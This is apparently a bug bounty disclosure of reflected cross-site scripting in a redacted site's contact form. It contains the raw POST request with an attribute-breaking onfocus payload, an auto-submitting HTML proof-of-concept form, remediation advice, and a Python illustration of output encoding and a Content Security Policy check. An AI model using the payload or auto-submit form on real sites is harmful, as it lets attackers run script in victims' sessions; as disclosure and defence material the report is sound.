I found Reflected XSS on https://███/contact-us/#.YsSAGCNBzaQ.
The parameters in the contact form are not properly filtered, leading to possible insertion of double-quote (") characters into the reflected value attribute and JavaScript execution.
Perform any action within the application that the user can perform.
View any information that the user is able to view.
Modify any information that the user is able to modify.
Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.
███████
POST /contact-us/ HTTP/1.1
Host: ███████
Cookie: wire=kh92hb67grih1376an7igoeo39; _ga_877MBKEB9K=GS1.1.1657044258.1.1.1657044351.0; _ga=GA1.2.58467857.1657044259; __atuvc=2%7C27; __atuvs=62c47d237cd3f8d9001; __atrfs=ab/|pos/|tot/|rsi/62c47d0400000000|cfc/|hash/0|rsiq/|fuid/d2cfdda4|rxi/|rsc/addressbar|gen/1|csi/|dr/; _gid=GA1.2.2089900381.1657044260; wires=cqr7lhfhfudpdntime6mevkslt; _gat_gtag_UA_377760_26=1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 142
Origin: https://██████
Referer: https://████████/contact-us/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
name="%20onfocus=alert('tmz900')%20autofocus//"&email=test%40gmail.com&phone=1234567895&message=test&submitted=submitted&g-recaptcha-response=
█████████
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://████/contact-us/" method="POST">
<input type="hidden" name="name" value="&quot; onfocus=alert('tmz900') autofocus//" />
<input type="hidden" name="email" value="test@gmail.com" />
<input type="hidden" name="phone" value="1234567895" />
<input type="hidden" name="message" value="test" />
<input type="hidden" name="submitted" value="submitted" />
<input type="hidden" name="g-recaptcha-response" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Filter input on arrival
Encode data on output
Use appropriate response headers
Content Security Policy.
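The "encode data on output" and "Content Security Policy" points above, illustrated with an added Python example that is not part of the report or of the affected application. It takes the exact value submitted in the report's "name" field (URL-decoded from the POST body and embedded here as a constructed constant), renders it once the way a vulnerable template would and once through HTML attribute encoding, and lists which attributes a browser would see on the resulting tag. The attribute parser, the header dictionary and the policy check are simplified helpers written for this illustration, not the application's own code.

```python
import html
import re
from typing import Dict, List

# Constructed sample: the value the report shows being submitted in the
# "name" field of the contact form (URL-decoded from the POST body).
REFLECTED_NAME = "\" onfocus=alert('tmz900') autofocus//"


def render_name_field_unsafe(name: str) -> str:
    """Vulnerable rendering: the submitted value is pasted straight into the
    value attribute. A double quote in the input closes the attribute and
    whatever follows becomes additional attributes on the <input>."""
    return f'<input type="text" name="name" value="{name}">'


def render_name_field_safe(name: str) -> str:
    """Encode on output: html.escape(quote=True) turns &, <, >, " and ' into
    entities, so the value can no longer terminate the attribute."""
    return f'<input type="text" name="name" value="{html.escape(name, quote=True)}">'


# Simplified attribute tokenizer (illustration only): an attribute name,
# optionally followed by = and a quoted or unquoted value.
ATTR_RE = re.compile(r'\s([a-zA-Z-]+)(?:=("[^"]*"|\'[^\']*\'|[^\s>]+))?')


def attribute_names(tag: str) -> List[str]:
    """Return the attribute names a browser would see on a single <input> tag."""
    inner = tag[len("<input"):tag.rindex(">")]
    return [m.group(1) for m in ATTR_RE.finditer(inner)]


def security_headers() -> Dict[str, str]:
    """Response headers a contact page can send: a CSP whose script-src does
    not allow 'unsafe-inline', so an injected inline event handler is not run
    even if encoding is missed somewhere, plus MIME sniffing protection."""
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
        "X-Content-Type-Options": "nosniff",
    }


def csp_blocks_inline_scripts(policy: str) -> bool:
    """True when the script-src directive (or default-src as its fallback)
    exists and does not contain 'unsafe-inline'."""
    directives = {}
    for part in policy.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    sources = directives.get("script-src", directives.get("default-src"))
    if sources is None:
        return False
    return "'unsafe-inline'" not in sources


if __name__ == "__main__":
    unsafe = render_name_field_unsafe(REFLECTED_NAME)
    safe = render_name_field_safe(REFLECTED_NAME)
    print("unsafe:", unsafe)
    print("  attributes seen:", attribute_names(unsafe))
    print("safe:  ", safe)
    print("  attributes seen:", attribute_names(safe))
    print("CSP blocks inline handlers:",
          csp_blocks_inline_scripts(security_headers()["Content-Security-Policy"]))
```

In the unsafe rendering the tokenizer reports onfocus and autofocus as attributes of the input, which is exactly how the browser interprets the report's payload; in the encoded rendering the whole string stays inside the value attribute. The CSP check shows the second layer: with script-src limited to 'self', an inline handler is refused even where encoding was forgotten.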